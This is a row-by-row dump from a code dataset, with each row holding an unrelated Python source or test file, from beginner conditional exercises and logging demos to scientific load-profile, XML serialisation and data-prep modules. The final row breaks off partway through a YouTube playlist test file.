max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
Python/python-practice/chapter5-if/toppints.py | jiaoqiyuan/Tests | 0 | 12796551 | <filename>Python/python-practice/chapter5-if/toppints.py
requested_topping = 'mushrooms'
if requested_topping != 'anchovies':
print("Hold the anchovies!")
answer = 17
if answer != 42:
print("That is not the correct answer. Please try again!")
requested_toppings = ['mushrooms', 'extra cheese']
if 'mushrooms' in requested_toppings:
print("Adding mushrooms.")
if 'pepperoni' in requested_toppings:
print("Adding pepperoni.")
if 'extra cheese' in requested_toppings:
print("Adding extra cheese.")
print("\nFinished making you pizza!")
requested_toppings = ['mushrooms', 'green peppers', 'extra cheese']
for requested_topping in requested_toppings:
if requested_topping == 'green peppers':
print("Sorry, we are out of green peppers fight now.")
else:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
requested_toppings = []
if requested_toppings:
for requested_topping in requested_toppings:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
else:
print("Are you sure you want a pizza?")
avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese']
requested_toppings = ['mushrooms', 'french fries', 'extra cheese']
for requested_topping in requested_toppings:
if requested_topping in avaliable_toppings:
print("Adding " + requested_topping + ".")
else:
print("Sorry, we don't have " + requested_topping + ".")
print("\nFinished making your pizza!") | 4.375 | 4 |
tools/initialcompdata/abundngc5286.py | lukeshingles/evelchemevol | 2 | 12796552 | from abundsolar import elsolarlogepsilon
zfactor = 10 ** -1.92
# mean of s-poor population in NGC5286
# from Marino et al. (2015) 2015MNRAS.450..815M
# [Fe/H] = -1.92
# log X/Fe = [X/Fe] + log(X/Fe)_solar
targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'],
'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'],
'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'],
'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'],
'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'],
'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'],
'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'],
'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'],
'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe']
}
| 1.875 | 2 |
log/basic_log.py | nkzmsb/howto | 0 | 12796553 | <filename>log/basic_log.py
import time
# print("===start: not use logging===")
# # logレベルの設定
# MODE = "INFO"
# for i in range(5): # 適当な繰り返しの処理を再現
# # 適当な処理・処理時間を再現
# a = i
# b = i * 2
# c = a + b
# time.sleep(1)
#
# if MODE == "DEBUG" or MODE == "INFO":
# print("a:{}, b:{}".format(a,b))
# if MODE == "INFO":
# print("c:{}".format(c))
print("===start: use logging===")
import logging
# logレベルの設定
logging.basicConfig(level=logging.DEBUG
, filename="log/basic_log.log" # This kwarg is not necessary when displaying imfomation on the screen
)
for i in range(5): # 適当な繰り返しの処理を再現
# 適当な処理・処理時間を再現
a = i
b = i * 2
c = a + b
time.sleep(1)
# DEBUGレベルの処理
logging.debug("a:{}, b:{}".format(a,b))
# INFOレベルの処理
logging.info("c:{}".format(c)) | 3.71875 | 4 |
wqxlib/wqx_v3_0/OrganizationAddress.py | FlippingBinary/wqxlib-python | 0 | 12796554 | from yattag import Doc
from .SimpleContent import (
AddressText,
AddressTypeName,
CountryCode,
CountyCode,
LocalityName,
PostalCode,
StateCode,
SupplementalAddressText,
)
class OrganizationAddress:
"""
The physical address of an organization.
"""
__addressTypeName: AddressTypeName
__addressText: AddressText
__supplementalAddressText: SupplementalAddressText
__localityName: LocalityName
__stateCode: StateCode
__postalCode: PostalCode
__countryCode: CountryCode
__countyCode: CountyCode
def __init__(
self,
o: dict = None,
*,
addressTypeName: AddressTypeName = None,
addressText: AddressText = None,
supplementalAddressText: SupplementalAddressText = None,
localityName: LocalityName = None,
stateCode: StateCode = None,
postalCode: PostalCode = None,
countryCode: CountryCode = None,
countyCode: CountyCode = None
):
if isinstance(o, OrganizationAddress):
# Assign attributes from object without typechecking
self.__addressTypeName = o.addressTypeName
self.__addressText = o.addressText
self.__supplementalAddressText = o.supplementalAddressText
self.__localityName = o.localityName
self.__stateCode = o.stateCode
self.__postalCode = o.postalCode
self.__countryCode = o.countryCode
self.__countyCode = o.countyCode
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.addressTypeName = o.get("addressTypeName")
self.addressText = o.get("addressText")
self.supplementalAddressText = o.get("supplementalAddressText")
self.localityName = o.get("localityName")
self.stateCode = o.get("stateCode")
self.postalCode = o.get("postalCode")
self.countryCode = o.get("countryCode")
self.countyCode = o.get("countyCode")
else:
# Assign attributes from named keywords with typechecking
self.addressTypeName = addressTypeName
self.addressText = addressText
self.supplementalAddressText = supplementalAddressText
self.localityName = localityName
self.stateCode = stateCode
self.postalCode = postalCode
self.countryCode = countryCode
self.countyCode = countyCode
@property
def addressTypeName(self) -> AddressTypeName:
return self.__addressTypeName
@addressTypeName.setter
def addressTypeName(self, val: AddressTypeName) -> None:
self.__addressTypeName = None if val is None else AddressTypeName(val)
@property
def addressText(self) -> AddressText:
return self.__addressText
@addressText.setter
def addressText(self, val: AddressText) -> None:
self.__addressText = None if val is None else AddressText(val)
@property
def supplementalAddressText(self) -> SupplementalAddressText:
return self.__supplementalAddressText
@supplementalAddressText.setter
def supplementalAddressText(self, val: SupplementalAddressText) -> None:
self.__supplementalAddressText = (
None if val is None else SupplementalAddressText(val)
)
@property
def localityName(self) -> LocalityName:
return self.__localityName
@localityName.setter
def localityName(self, val: LocalityName) -> None:
self.__localityName = None if val is None else LocalityName(val)
@property
def stateCode(self) -> StateCode:
return self.__stateCode
@stateCode.setter
def stateCode(self, val: StateCode) -> None:
self.__stateCode = None if val is None else StateCode(val)
@property
def postalCode(self) -> PostalCode:
return self.__postalCode
@postalCode.setter
def postalCode(self, val: PostalCode) -> None:
self.__postalCode = None if val is None else PostalCode(val)
@property
def countryCode(self) -> CountryCode:
return self.__countryCode
@countryCode.setter
def countryCode(self, val: CountryCode) -> None:
self.__countryCode = None if val is None else CountryCode(val)
@property
def countyCode(self) -> CountyCode:
return self.__countyCode
@countyCode.setter
def countyCode(self, val: CountyCode) -> None:
self.__countyCode = None if val is None else CountyCode(val)
def generateXML(self, name: str = "OrganizationAddress") -> str:
doc = Doc()
line = doc.line
tag = doc.tag
with tag(name):
if self.__addressTypeName is not None:
line("AddressTypeName", self.__addressTypeName)
if self.__addressText is not None:
line("AddressText", self.__addressText)
if self.__supplementalAddressText is not None:
line("SupplementalAddressText", self.__supplementalAddressText)
if self.__localityName is not None:
line("LocalityName", self.__localityName)
if self.__stateCode is not None:
line("StateCode", self.__stateCode)
if self.__postalCode is not None:
line("PostalCode", self.__postalCode)
if self.__countryCode is not None:
line("CountryCode", self.__countryCode)
if self.__countyCode is not None:
line("CountyCode", self.__countyCode)
return doc.getvalue()
| 2.765625 | 3 |
tests/flag_test.py | harrybrwn/dispatch | 0 | 12796555 | <filename>tests/flag_test.py
import pytest
from pytest import raises
import sys
from os.path import dirname
sys.path.insert(0, dirname(dirname(__file__)))
from typing import List, Set, Dict, Sequence, Mapping
from dispatch import command
from dispatch.flags import Option, _from_typing_module, _is_iterable
class AType:
def __init__(self, val):
self.val = val
def testTypeParsing():
o = Option('o', List[int])
o.setval('[1,2,3,4]')
assert isinstance(o.value, list)
for got, want in zip(o.value, [1, 2, 3, 4]):
assert isinstance(got, int)
assert isinstance(want, int)
assert got == want
o = Option('o', list)
o.setval('[1,2,3,4]')
assert isinstance(o.value, list)
for got, want in zip(o.value, [1, 2, 3, 4]):
assert isinstance(got, str)
assert isinstance(want, int)
assert int(got) == want
assert got == str(want)
o = Option('o', Set[float])
o.setval('[1.5,2.6,3.7,4.8]')
assert isinstance(o.value, set)
for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]):
assert isinstance(got, float)
assert isinstance(want, float)
assert got == want
assert got == want
o = Option('o', Dict[str, int])
o.setval('{one:1,two:2,three:3}')
assert isinstance(o.value, dict)
for k, v in o.value.items():
assert isinstance(k, str)
assert isinstance(v, int)
opt = Option('num', complex)
opt.setval('5+9j')
assert opt.value == complex(5, 9)
opt.setval(complex(7, 2))
assert opt.value == complex(7, 2)
opt.setval(6.7)
assert opt.value == complex(6.7, 0)
opt = Option('type', AType)
opt.setval('hello')
assert isinstance(opt.value, AType)
assert opt.value.val == 'hello'
def testBadTypeParsing():
o = Option('outout', Dict[str, float])
opt = Option('num', complex)
@command
def f(keys: Dict[str, float]):
pass
with raises(ValueError):
o.setval('{one:1.0,two:2.5,three:the third number,four:4}')
opt.setval('4+3i')
f(['--keys', '{one:1,two:this is the number two}'])
def testIsIterable():
assert _is_iterable(str)
assert _is_iterable(list)
assert _is_iterable(dict)
assert _is_iterable(set)
assert _is_iterable(List)
assert _is_iterable(Dict)
assert _is_iterable(Sequence)
assert _is_iterable(Mapping)
class A: pass # noqa
assert not _is_iterable(int)
assert not _is_iterable(float)
assert not _is_iterable(A)
assert _is_iterable([1, 2, 3])
def testFromTypingModule():
assert _from_typing_module(List)
assert _from_typing_module(Sequence)
assert _from_typing_module(Dict[int, str])
assert not _from_typing_module(list)
assert not _from_typing_module(int)
assert not _from_typing_module(dict)
class A: pass # noqa
assert not _from_typing_module(A)
| 2.71875 | 3 |
JellyBot/api/ar/__init__.py | RaenonX/Jelly-Bot-API | 5 | 12796556 | from .add import AutoReplyAddView, AutoReplyAddExecodeView
from .validate import ContentValidationView
from .tag import AutoReplyTagPopularityQueryView
| 0.902344 | 1 |
tests/test_filename.py | mverbowski/beets-copyartifacts | 0 | 12796557 | import os
import sys
from helper import CopyArtifactsTestCase
from beets import config
class CopyArtifactsFilename(CopyArtifactsTestCase):
"""
Tests to check handling of artifacts with filenames containing unicode characters
"""
def setUp(self):
super(CopyArtifactsFilename, self).setUp()
self._set_import_dir()
self.album_path = os.path.join(self.import_dir, 'the_album')
os.makedirs(self.album_path)
self._setup_import_session(autotag=False)
config['copyartifacts']['extensions'] = '.file'
def test_import_dir_with_unicode_character_in_artifact_name_copy(self):
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_unicode_character_in_artifact_name_move(self):
config['import']['move'] = True
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_illegal_character_in_album_name(self):
config['paths']['ext:file'] = unicode('$albumpath/$artist - $album')
# Create import directory, illegal filename character used in the album name
open(os.path.join(self.album_path, u'artifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),
'full.mp3',
'Tag Album?')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
| 2.609375 | 3 |
jina_commons/logging.py | chuangfengwang/jina-commons | 5 | 12796558 | import functools
import os
import time
from typing import List
from jina import DocumentArray
from jina.logging.logger import JinaLogger
from jina.enums import LogVerbosity
def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:
non_empty_fields = list(docs[0].non_empty_fields)
for doc in docs[:1]:
for field in non_empty_fields:
if field not in doc.non_empty_fields:
non_empty_fields.pop(field)
return non_empty_fields
def add_request_logger(logger):
"""
Add logging functionality to a request function.
Only shows logs for `JINA_LOG_LEVEL` > info.
You can set this as an env variable before starting your `Jina` application.
Example usages:
>>> from jina import Executor, requests
>>> my_logger = JinaLogger('MyExecLogger')
>>>
>>> class MyExec(Executor):
>>> @requests
>>> @add_request_logger(my_logger)
>>> def index(self, docs, parameters, **kwargs):
>>> ...
:param logger: The logger you want to use
"""
def decorator(function):
@functools.wraps(function)
def wrapper(self, docs, parameters, **kwargs):
verbose_level = os.environ.get('JINA_LOG_LEVEL', None)
verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None
if verbose_level is None or verbose_level > LogVerbosity.DEBUG:
return function(self, docs, parameters, **kwargs)
if not docs:
logger.debug('Docs is None. Nothing to monitor')
return function(self, docs, parameters, **kwargs)
logger.debug(f'📄 Received request containing {len(docs)} documents.')
logger.debug(f'📕 Received parameters dictionary: {parameters}')
if len(docs) > 0:
non_empty_fields = _get_non_empty_fields_doc_array(docs)
logger.debug(f'🏷 Non-empty fields {non_empty_fields}')
start_time = time.time()
result = function(self, docs, parameters, **kwargs)
end_time = time.time()
logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')
return result
return wrapper
return decorator
| 2.375 | 2 |
otscrape/core/extractor/file/file.py | SSripilaipong/otscrape | 0 | 12796559 | <gh_stars>0
from otscrape.core.base.extractor import Extractor
from otscrape.core.loader.file import LineObject
class FileContent(Extractor):
def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
super().__init__(target=target, project=project, replace_error=replace_error)
self.kwargs = kwargs
def extract(self, page, cache):
target = self.target
x = page[target]
assert isinstance(x, (LineObject,))
return x.content
class FileName(Extractor):
def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
super().__init__(target=target, project=project, replace_error=replace_error)
self.kwargs = kwargs
def extract(self, page, cache):
target = self.target
x = page[target]
assert isinstance(x, (LineObject,))
return x.filename
| 2.3125 | 2 |
kungfucms/apps/account/signals.py | youngershen/kungfucms | 0 | 12796560 | # PROJECT : kungfucms
# TIME : 2020/6/9 12:54
# AUTHOR : <NAME>
# EMAIL : <EMAIL>
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
from django.core.signals import request_started, \
request_finished
from django.dispatch import Signal, receiver
before_sign_in = Signal(providing_args=["toppings", "size"])
after_sign_in = Signal(providing_args=["toppings", "size"])
sign_in_post_permission = Signal(providing_args=["toppings", "size"])
@receiver(request_started)
def before_request(sender, **kwargs):
pass
@receiver(request_finished)
def after_request(sender, **kwargs):
pass
| 1.929688 | 2 |
Topics/Algorithms in Python/Last index of max/main.py | soukalli/jetbrain-accademy | 0 | 12796561 | def last_indexof_max(numbers):
# write the modified algorithm here
index = 0
for i in range(len(numbers)):
if numbers[i] >= numbers[index]:
index = i
return index
| 3.890625 | 4 |
aula2/exercicio2.py | ArseniumGX/bluemer-modulo1-python | 0 | 12796562 | <filename>aula2/exercicio2.py
""" 02 - Qual o valor do troco?
Defina uma variável para o valor de uma compra que custou R$100,98;
Defina uma variável para o valor que o cliente pagou R$150,00;
Defina uma variável que calcula o valor do troco e exiba-o no console com o valor final arredondado.
"""
valor_compra = 100.98
valor_pago = 150.00
troco = valor_pago - valor_compra
print(f'O seu troco é: R$ {troco:.2f}')
| 2.984375 | 3 |
model/contact.py | dmi-vor/python_training | 0 | 12796563 | <reponame>dmi-vor/python_training<gh_stars>0
from sys import maxsize
class Contact:
def __init__(self, firstname=None, middlename=None, lastname=None, id=None,
nickname=None, title=None, company=None, address=None,
homephone=None, mobilephone=None, workphone=None, fax=None,
email_1=None, email_2=None, email_3=None, homepage=None,
address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None):
self.firstname = firstname
self.middlename = middlename
self.lastname = lastname
self.nickname = nickname
self.title = title
self.company = company
self.address = address
self.homephone = homephone
self.mobilephone = mobilephone
self.workphone = workphone
self.fax = fax
self.email_1 = email_1
self.email_2 = email_2
self.email_3 = email_3
self.homepage = homepage
self.address_2 = address_2
self.homephone2 = homephone2
self.notes = notes
self.all_emails_from_homepage = all_emails_from_homepage
self.all_phones_from_homepage = all_phones_from_homepage
self.id = id
def __repr__(self):
return "%s:%s:%s" % (self.id, self.firstname, self.lastname)
def __eq__(self, other):
return (self.id is None or other.id is None or self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname
def id_or_max(self):
if self.id:
return int(self.id)
else:
return maxsize
| 2.765625 | 3 |
reo/src/load_profile_chiller_thermal.py | akuam1/REopt_Lite_API | 0 | 12796564 | <reponame>akuam1/REopt_Lite_API<gh_stars>0
from reo.src.load_profile import BuiltInProfile
import os
import json
import pandas as pd
import numpy as np
from datetime import datetime
from reo.utilities import TONHOUR_TO_KWHT
class LoadProfileChillerThermal(BuiltInProfile):
"""
Chiller Load Profiles based on CRB defined load shapes or user-defined input
"""
with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f:
annual_loads = json.loads(f.read())
builtin_profile_prefix = "Cooling8760_norm_"
electric_chiller_cop_defaults = { "convert_elec_to_thermal": 4.55,
"less_than_100_tons": 4.40,
"greater_than_100_tons": 4.69}
@staticmethod
def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None):
if max_ton is not None:
max_cooling_load_tons = max_ton
elif max_kwt is not None:
max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT
elif max_kw is not None:
max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \
LoadProfileChillerThermal.electric_chiller_cop_defaults["convert_elec_to_thermal"]
else:
raise Exception("Please supply a max_ton, max_kwt or max_kw value")
estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load
if estimated_max_chiller_thermal_capacity_tons < 100.0:
return LoadProfileChillerThermal.electric_chiller_cop_defaults["less_than_100_tons"]
else:
return LoadProfileChillerThermal.electric_chiller_cop_defaults["greater_than_100_tons"]
def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None,
time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs):
"""
:param dfm: (object) data_manager to which this load object will be added
:param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs
:param latitude: (float) site latitude
:param longitude: (float) site longitude
:param nearest_city: (str) site nearest_city
:param time_steps_per_hour: (int) simulation time resolution
:param year: (int) electric LoadProfile year
:param chiller_cop: (float or int) Coefficient of Performance for Chiller
:param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller
:param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs
"""
self.nearest_city = nearest_city
self.latitude = latitude
self.longitude = longitude
self.time_steps_per_hour = time_steps_per_hour
self.year = year
# Default electric_load_list to None, used later to see if we need to covert kWh to kWht
electric_load_list = None
# Use highest resultion/quality input first
if kwargs.get('loads_ton') is not None:
self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']]
# DOE Reference building profile are used if there is a reference name provided
elif kwargs.get('doe_reference_name'):
doe_reference_name = kwargs.get('doe_reference_name') or []
combine_loadlist = []
for i in range(len(doe_reference_name)):
# Monthly loads can only be used to scale a non-hybrid profile
kwargs['monthly_totals_energy'] = kwargs.get("monthly_tonhour")
if len(doe_reference_name)>1:
kwargs['monthly_totals_energy'] = None
kwargs['annual_energy'] = None
# Annual loads are used in place of percent shares if provided
if kwargs.get("annual_tonhour") is not None:
kwargs['annual_energy'] = kwargs["annual_tonhour"]
kwargs['annual_loads'] = self.annual_loads
kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix
kwargs['latitude'] = latitude
kwargs['longitude'] = longitude
kwargs['doe_reference_name'] = doe_reference_name[i]
kwargs['nearest_city'] = nearest_city
kwargs['time_steps_per_hour'] = time_steps_per_hour
kwargs['year'] = year
super(LoadProfileChillerThermal, self).__init__(**kwargs)
if time_steps_per_hour > 1:
partial_load_list = np.concatenate([[x] * time_steps_per_hour \
for x in self.built_in_profile])
else:
partial_load_list = self.built_in_profile
combine_loadlist.append(list(partial_load_list))
# In the case where the user supplies a list of doe_reference_names and percent shares
# for consistency we want to act as if we had scaled the partial load to the total site
# load which was unknown at the start of the loop above. This scalar makes it such that
# when the percent shares are later applied that the total site load will be the sum
# of the default annual loads for this location
if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None:
total_site_load = sum([sum(l) for l in combine_loadlist])
for i, load in enumerate(combine_loadlist):
actual_percent_of_site_load = sum(load)/total_site_load
scalar = 1.0 / actual_percent_of_site_load
combine_loadlist[i] = list(np.array(load)* scalar)
#Apply the percent share of annual load to each partial load
if (len(doe_reference_name) > 1):
for i, load in enumerate(combine_loadlist):
combine_loadlist[i] = list(np.array(load) * (kwargs.get("percent_share")[i]/100.0))
# Aggregate total hybrid load
hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0))
if (kwargs.get("annual_tonhour") is not None) or (kwargs.get("monthly_tonhour") is not None):
#load_list is always expected to be in units of kWt
self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist]
else:
electric_load_list = hybrid_loadlist
# If no doe_reference_name or loads_ton provided, scale by a fraction of electric load
elif kwargs.get('loads_fraction') is not None:
electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list))
elif kwargs.get('monthly_fraction') is not None:
month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour)
electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \
for i, month in enumerate(month_series.month)]
elif kwargs.get('annual_fraction') is not None:
electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list]
#Calculate COP based on kwth load or kw load (if not user-entered)
self.chiller_cop = chiller_cop
# Update COP based on estimated max chiller load
if self.chiller_cop is None:
if electric_load_list is not None:
#This is a static method so it can be accessible in views.py
self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
max_kw=max(electric_load_list),
max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)
else:
#This is a static method so it can be accessible in views.py
self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
max_kwt=max(self.load_list),
max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)
# load_list is always expected to be in units of kWth
if electric_load_list is not None:
self.load_list = [i*self.chiller_cop for i in electric_load_list]
self.annual_kwht = int(round(sum(self.load_list),0))
if dfm is not None:
dfm.add_load_chiller_thermal(self)
| 2.484375 | 2 |
ac/messagepgp.py | juga0/djac | 0 | 12796565 | <reponame>juga0/djac
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:expandtab
# Copyright 2017 juga (juga at riseup dot net), under MIT license.
"""Extend Django email classes for MIME multipart/pgp-encrypted
type messages.
"""
__all__ = ['EmailMessageEnc', 'EmailMessagePGP']
from django.conf import settings
from django.core.mail.message import (
EmailMessage, MIMEMixin,
forbid_multi_line_headers, force_text,
make_msgid, formatdate, DNS_NAME)
from emailpgp.mime.multipartpgp import MIMEMultipartPGP
from autocrypt.pgpymessage import gen_ac_header_dict
class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP):
def __init__(self, _data=None, _subtype='encrypted', boundary=None,
encoding=None, **_params):
self.encoding = encoding
MIMEMultipartPGP.__init__(self, _data, boundary, **_params)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEMultipartPGP.__setitem__(self, name, val)
class EmailMessageEnc(EmailMessage):
def message(self, msg):
self.msg = msg
class EmailMessagePGP(EmailMessage):
"""A container for encrypted email information."""
content_subtype = 'encrypted'
mixed_subtype = ''
def message(self):
encoding = self.encoding or settings.DEFAULT_CHARSET
msg = MIMEMultipartPGP(self.body)
# FIXME: attachments
# msg = self._create_message(msg)
msg['Subject'] = self.subject
msg['From'] = self.extra_headers.get('From', self.from_email)
msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to)))
if self.cc:
msg['Cc'] = ', '.join(map(force_text, self.cc))
if self.reply_to:
msg['Reply-To'] = self.extra_headers.get(
'Reply-To', ', '.join(map(force_text, self.reply_to)))
# Email header names are case-insensitive (RFC 2045), so we have to
# accommodate that when doing comparisons.
header_names = [key.lower() for key in self.extra_headers]
if 'date' not in header_names:
# formatdate() uses stdlib methods to format the date, which use
# the stdlib/OS concept of a timezone, however, Django sets the
# TZ environment variable based on the TIME_ZONE setting which
# will get picked up by formatdate().
msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME)
if 'message-id' not in header_names:
# Use cached DNS_NAME for performance
msg['Message-ID'] = make_msgid(domain=DNS_NAME)
for name, value in self.extra_headers.items():
# From and To are already handled
if name.lower() in ('from', 'to'):
continue
msg[name] = value
return msg
def EmailMessagePGPAC(EmailMessagePGP):
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, cc=None,
reply_to=None, keydata=None, pe=None):
super(EmailMessagePGPAC, self).__init__(
subject, body, from_email, to, bcc, connection, attachments,
headers, cc, reply_to)
self.extra_headers = self.extra_headers.update(
gen_ac_header_dict(to, keydata, pe))
| 2.140625 | 2 |
lib/googlecloudsdk/command_lib/dataproc/batches/sparksql_batch_factory.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12796566 | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for SparkSqlBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class SparkSqlBatchFactory(object):
"""Factory class for SparkSqlBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkSqlBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""Uploads local files and creates a SparkSqlBatch message.
Uploads user local files and change the URIs to local files to uploaded
URIs.
Creates a SparkSqlBatch message.
Args:
args: Parsed arguments.
Returns:
A SparkSqlBatch message instance.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
dependencies = {}
# Upload requires a list.
dependencies['queryFileUri'] = [args.SQL_SCRIPT]
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
params = None
if args.script_variables:
params = args.script_variables
elif args.vars:
params = args.vars
if params:
kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(
params,
self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,
sort_items=True)
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
dependencies = local_file_uploader.Upload(args.bucket, dependencies)
# Move main SQL script out of the list.
dependencies['queryFileUri'] = dependencies['queryFileUri'][0]
# Merge the dictionaries first for compatibility.
kwargs.update(dependencies)
return self.dataproc.messages.SparkSqlBatch(**kwargs)
def AddArguments(parser):
flags.AddMainSqlScript(parser)
flags.AddJarFiles(parser)
flags.AddSqlScriptVariables(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
| 2.125 | 2 |
data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py | sampathkumaran90/pytorch-pipeline | 0 | 12796567 | <reponame>sampathkumaran90/pytorch-pipeline<filename>data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py
import shutil
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from sklearn.model_selection import train_test_split
from torch import nn
from torch.utils.data import Dataset, DataLoader
from transformers import (
BertModel,
BertTokenizer,
AdamW
)
import argparse
import os
from tqdm import tqdm
import requests
from torchtext.utils import download_from_url, extract_archive
from torchtext.datasets.text_classification import URLS
import sys
import argparse
import logging
def run_pipeline(input_options):
"""
This method downloads the dataset and extract it along with the vocab file
:param input_options: Input arg parameters
"""
dataset_tar = download_from_url(
URLS["AG_NEWS"], root=input_options["output"])
extracted_files = extract_archive(dataset_tar)
if not os.path.isfile(input_options["VOCAB_FILE"]):
filePointer = requests.get(
input_options["VOCAB_FILE_URL"], allow_redirects=True)
if filePointer.ok:
with open(input_options["VOCAB_FILE"], "wb") as f:
f.write(filePointer.content)
else:
raise RuntimeError("Error in fetching the vocab file")
def PrintOptions(options):
"""
Logging for debugging
"""
for a in options.items():
print(a)
def run_pipeline_component(options):
"""
Method called from entry point to execute the pipeline
"""
print("Running data prep job from container")
logging.getLogger().setLevel(logging.INFO)
PrintOptions(options)
run_pipeline(
options
)
# if __name__ == "__main__":
# run_pipeline_component({
# "output": "./",
# "VOCAB_FILE": "bert_base_uncased_vocab.txt",
# "VOCAB_FILE_URL": "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt"
# })
| 2.671875 | 3 |
test.py | 12beesinatrenchcoat/yt-playlist-discord-webhook | 2 | 12796568 | <filename>test.py<gh_stars>1-10
# Unit tests, I guess.
import unittest
import typing
import main
# A test playlist created by myself to test various features of the script.
# It contains five videos, added by two different users,
# and some videos don't have maxres thumbnails.
# This playlist shouldn't be changed.
TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb'
# Testing functions revolving around YouTube and video filtering.
